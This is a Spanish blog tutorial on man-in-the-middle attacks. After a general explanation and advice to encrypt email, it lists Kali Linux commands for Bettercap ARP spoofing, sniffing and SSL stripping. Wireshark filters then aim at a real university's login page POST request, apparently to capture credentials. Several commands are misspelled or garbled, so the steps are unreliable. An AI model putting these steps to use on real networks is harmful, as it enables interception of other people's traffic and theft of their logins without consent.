Ataque Hombre en Medio Con Bettercap y Wireshark

El ataque de MITM por sus siglas en inglés (Man in the middle), consiste en intervenir la comunicación que establecen dos partes entre ellas, sin que éstas puedan percibir la intromisión, el atacante puede estar ubicado de forma física o lógica. Un ataque de tipo MITM compromete principalmente las siguientes características de seguridad:

  • Confidencialidad: al escuchar la comunicación entre dos personas o equipos.
  • Integridad: al interceptar la comunicación y modificar la información.
  • Disponibilidad: al desviar o destruir los mensajes de tal forma que se provoque el fin de la comunicación entre las dos partes que se comunican.

Para contribuir al entendimiento de este tipo de ataque, supongamos el siguiente escenario donde se afecta la confidencialidad, la integridad y la disponibilidad:

Entre dos miembros de una empresa se realizará el envío de un archivo vía correo electrónico, hay un tercero (el intruso) que durante una conversación, sin ser descubierto ha escuchado la hora en la cual se realizará un intercambio electrónico afectando así la confidencialidad  de esta forma el atacante durante la transmisión del archivo interceptará la comunicación y modificará el documento dañando así la integridad  de tal forma que cuando el destinatario lo reciba, no percibirá la modificación; por último, si el atacante destruye la información obtenida durante la intercepción está ya no llegará al destinatario, lo que ocasionará el fin de la comunicación afectando así la disponibilidad.

Como medidas preventivas para este tipo de ataque se recomienda a los usuarios el empleo de claves públicas de cifrado, cifrado de la información, uso de certificados y firmas digitales.

Debido a la importancia que en la actualidad ha adquirido el uso de correo electrónico, para el intercambio de información, por ser una herramienta de comunicación rápida, económica, directa y personalizada; se ha vuelto un blanco de amenazas que atentan contra la seguridad de esta herramienta de comunicación. De esta forma surge como una medida de protección contra intrusos el uso del correo electrónico cifrado, que consiste en utilizar un algoritmo de cifrado para transformar el mensaje en una representación incomprensible para aquella persona que no cuente con autorización para recibir la información.

Entre los mecanismos más utilizados en la actualidad para el cifrado de correo electrónico destacan PGP y S/MIME, los cuales se detallan al final del artículo.

Qué es un ataque Man-in-the-Middle (MITM)? Definición y prevención

Para la selección adecuada del algoritmo de cifrado de correo electrónico es necesario considerar los siguientes aspectos:

  • El valor de la información para la organización (considerando el impacto que conllevaría la divulgación, perdida o modificación no autorizada), ya que al intercambiar información de alta confidencialidad será requerido un algoritmo de cifrado riguroso para su protección.
  • El tiempo de valor de la información, esto considera aquella información que adquiere valor por un periodo determinado de tiempo (contraseñas que sean cambiadas regularmente y que para protegerlos pueda utilizarse tamaños más pequeños de llave).
  • El riesgo de amenaza para la información, es decir, para aquella que tenga mayor exposición hacia alguna fuente amenazada que implique un nivel de riesgo elevado se recomienda utilizar un método robusto de cifrado.
  • Con relación a infraestructura, es necesario considerar que los correos electrónicos cifrados requieren un ancho de banda mayor, el cual depende del algoritmo de cifrado utilizado, el número de destinatarios, el tamaño de la clave y del mensaje.

De esta forma el cifrado de correo electrónico se convierte en una alternativa como mecanismo de protección que contribuirá a reducir el riesgo de ser dañados por las amenazas a las cuales pueda estar expuesta toda la información que es intercambiada diariamente mediante el uso de correo electrónico. Además, es necesario que los usuarios de este medio de comunicación estén al tanto de los mecanismos disponibles que contribuyan a reforzar las medidas de seguridad implementadas para proteger su información, porque la seguridad es responsabilidad de todos y cada uno de los usuarios que hacen uso de nuevas tecnologías de comunicación.

A Complete Guide to Man in The Middle Attack (MitM)

 

Índice de contenido

    ¿Como Hacer ataque en Red Local?

    Para realizar el ataque primero se necesitas acceder a kali Linux, ya sea en modo live o una instalación

    comandos del video tutorial 

    sudo bash
    apt-get install build-essential ruby-dev libcap-dev
    apt update
    apt-get install bettercap
    ebettercap --version
    battercap
    help

    MONITOREO DE CONEXION
    net.probe on
    ticket on

    SNIFFING (paginas que esta entrando)
    set arp.spoof.targets (direccion ip) //opcional
    arp.spoof on
    set net.sniff.verbose false
    net.sniff on

    EXPLOTACION DE NAVEGADOR
    set http.proxy.sslstrip true
    set net.sniff.verbose false
    arp.spoof on
    http.proxy on
    net.sniff on

    CAPTURAR TRAFICO
    sudo bash
    wireshark

    EJEMPLO DE FILTRO DE TRAFICO EN WIRESHARK 

    source port - des port
    tpc - udp(53) -dns
    tcp.port == 443
    tcp.dstport== 443
    tcp.port == 443 || udp.port == 443

    http://cvirtual.itm.edu.co/login/index.php
    http
    POST /login/index.php

    Tutorial:

    Sergio Caballero

    Soy un ingeniero en sistemas dedicado al campo de investigación ya apasionado por la tecnología

    Go up

    Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Política de cookies